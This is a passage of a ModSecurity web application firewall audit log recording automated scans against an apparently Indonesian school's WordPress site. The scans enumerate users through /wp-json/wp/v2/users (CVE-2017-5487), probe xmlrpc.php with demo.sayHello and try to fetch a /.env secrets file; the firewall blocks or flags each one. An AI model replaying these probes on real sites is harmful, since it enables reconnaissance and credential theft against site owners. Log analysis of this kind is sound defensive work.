p2=788, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d665d043-Z-- --c3b17353-A-- [09/May/2025:08:02:43 +0700] aB1UMx6q_ZMebht3q15VigAAAIU 103.236.140.4 45926 103.236.140.4 8181 --c3b17353-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c3b17353-C-- demo.sayHello --c3b17353-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3b17353-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746752563156709 4653 (- - -) Stopwatch2: 1746752563156709 4653; combined=3600, p1=453, p2=2949, p3=24, p4=25, p5=87, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3b17353-Z-- --09967677-A-- [09/May/2025:08:07:20 +0700] aB1VSFqQ1nOVx9fWpZTDrQAAABM 103.236.140.4 45956 103.236.140.4 8181 --09967677-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09967677-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09967677-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746752840766127 3059 (- - -) Stopwatch2: 1746752840766127 3059; combined=1295, p1=442, p2=824, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09967677-Z-- --aaf44317-A-- [09/May/2025:08:07:29 +0700] aB1VUVqQ1nOVx9fWpZTDrwAAABc 103.236.140.4 45960 103.236.140.4 8181 --aaf44317-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aaf44317-C-- demo.sayHello --aaf44317-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaf44317-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746752849546455 4926 (- - -) Stopwatch2: 1746752849546455 4926; combined=3752, p1=432, p2=3113, p3=25, p4=24, p5=92, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaf44317-Z-- --774b387a-A-- [09/May/2025:08:30:01 +0700] aB1amS-fAO47ojYKsMoY9gAAAEE 103.236.140.4 46144 103.236.140.4 8181 --774b387a-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.226.78.121 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.226.78.121 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --774b387a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --774b387a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746754201471307 854 (- - -) Stopwatch2: 1746754201471307 854; combined=315, p1=280, p2=0, p3=0, p4=0, p5=34, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --774b387a-Z-- --9df47253-A-- [09/May/2025:08:30:02 +0700] aB1amloC-7ITMWTA_c98CQAAAMk 103.236.140.4 46146 103.236.140.4 8181 --9df47253-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9df47253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9df47253-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746754202642244 2826 (- - -) Stopwatch2: 1746754202642244 2826; combined=1264, p1=439, p2=794, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9df47253-Z-- --75008128-A-- [09/May/2025:08:30:06 +0700] aB1anlqQ1nOVx9fWpZTDxAAAABA 103.236.140.4 46158 103.236.140.4 8181 --75008128-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75008128-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75008128-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746754206692505 2413 (- - -) Stopwatch2: 1746754206692505 2413; combined=1171, p1=407, p2=730, p3=0, p4=0, p5=34, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75008128-Z-- --8ae1d458-A-- [09/May/2025:08:30:10 +0700] aB1aoi-fAO47ojYKsMoY9wAAAEU 103.236.140.4 46164 103.236.140.4 8181 --8ae1d458-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ae1d458-C-- demo.sayHello --8ae1d458-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ae1d458-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746754210115390 4517 (- - -) Stopwatch2: 1746754210115390 4517; combined=3486, p1=447, p2=2846, p3=21, p4=24, p5=87, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ae1d458-Z-- --08b3b630-A-- [09/May/2025:08:30:11 +0700] aB1aox6q_ZMebht3q15VnwAAAJc 103.236.140.4 46168 103.236.140.4 8181 --08b3b630-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.231 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --08b3b630-C-- demo.sayHello --08b3b630-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --08b3b630-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746754211965748 4821 (- - -) Stopwatch2: 1746754211965748 4821; combined=3632, p1=421, p2=2994, p3=21, p4=22, p5=100, sr=66, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08b3b630-Z-- --ca4fd41a-A-- [09/May/2025:08:42:38 +0700] aB1djlqQ1nOVx9fWpZTD4wAAAAw 103.236.140.4 46284 103.236.140.4 8181 --ca4fd41a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca4fd41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca4fd41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746754958850781 3025 (- - -) Stopwatch2: 1746754958850781 3025; combined=1307, p1=450, p2=828, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca4fd41a-Z-- --e010f56a-A-- [09/May/2025:08:42:46 +0700] aB1dli-fAO47ojYKsMoY-QAAAEc 103.236.140.4 46290 103.236.140.4 8181 --e010f56a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.239 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e010f56a-C-- demo.sayHello --e010f56a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e010f56a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746754966100828 5336 (- - -) Stopwatch2: 1746754966100828 5336; combined=3993, p1=476, p2=3301, p3=24, p4=29, p5=95, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e010f56a-Z-- --11fbb86d-A-- [09/May/2025:08:43:58 +0700] aB1d3lqQ1nOVx9fWpZTD5gAAAA8 103.236.140.4 46296 103.236.140.4 8181 --11fbb86d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --11fbb86d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11fbb86d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746755038567334 3385 (- - -) Stopwatch2: 1746755038567334 3385; combined=1427, p1=481, p2=911, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11fbb86d-Z-- --e2471a7c-A-- [09/May/2025:08:44:03 +0700] aB1d4x6q_ZMebht3q15VpgAAAIg 103.236.140.4 46300 103.236.140.4 8181 --e2471a7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e2471a7c-C-- demo.sayHello --e2471a7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2471a7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746755043892366 6193 (- - -) Stopwatch2: 1746755043892366 6193; combined=4442, p1=551, p2=3634, p3=38, p4=34, p5=106, sr=74, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2471a7c-Z-- --4103d267-A-- [09/May/2025:08:51:43 +0700] aB1fry-fAO47ojYKsMoY_wAAAFI 103.236.140.4 46328 103.236.140.4 8181 --4103d267-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4103d267-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4103d267-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746755503356693 3063 (- - -) Stopwatch2: 1746755503356693 3063; combined=1353, p1=505, p2=819, p3=0, p4=0, p5=29, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4103d267-Z-- --d1b0f819-A-- [09/May/2025:08:51:50 +0700] aB1fth6q_ZMebht3q15VqgAAAI0 103.236.140.4 46332 103.236.140.4 8181 --d1b0f819-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d1b0f819-C-- demo.sayHello --d1b0f819-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1b0f819-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746755510038312 6790 (- - -) Stopwatch2: 1746755510038312 6790; combined=4816, p1=589, p2=3969, p3=39, p4=43, p5=103, sr=76, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1b0f819-Z-- --2c43a67d-A-- [09/May/2025:09:07:52 +0700] aB1jeFqQ1nOVx9fWpZTD9AAAABU 103.236.140.4 46444 103.236.140.4 8181 --2c43a67d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2c43a67d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c43a67d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746756472803764 3462 (- - -) Stopwatch2: 1746756472803764 3462; combined=1480, p1=496, p2=948, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c43a67d-Z-- --5fe4ba6f-A-- [09/May/2025:09:07:58 +0700] aB1jfh6q_ZMebht3q15VtAAAAIc 103.236.140.4 46448 103.236.140.4 8181 --5fe4ba6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5fe4ba6f-C-- demo.sayHello --5fe4ba6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fe4ba6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746756478230946 5197 (- - -) Stopwatch2: 1746756478230946 5197; combined=3913, p1=484, p2=3206, p3=23, p4=26, p5=100, sr=69, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fe4ba6f-Z-- --281c333f-A-- [09/May/2025:09:11:28 +0700] aB1kUC-fAO47ojYKsMoZDAAAAFM 103.236.140.4 46468 103.236.140.4 8181 --281c333f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --281c333f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281c333f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746756688645546 3466 (- - -) Stopwatch2: 1746756688645546 3466; combined=1457, p1=481, p2=944, p3=0, p4=0, p5=31, sr=78, 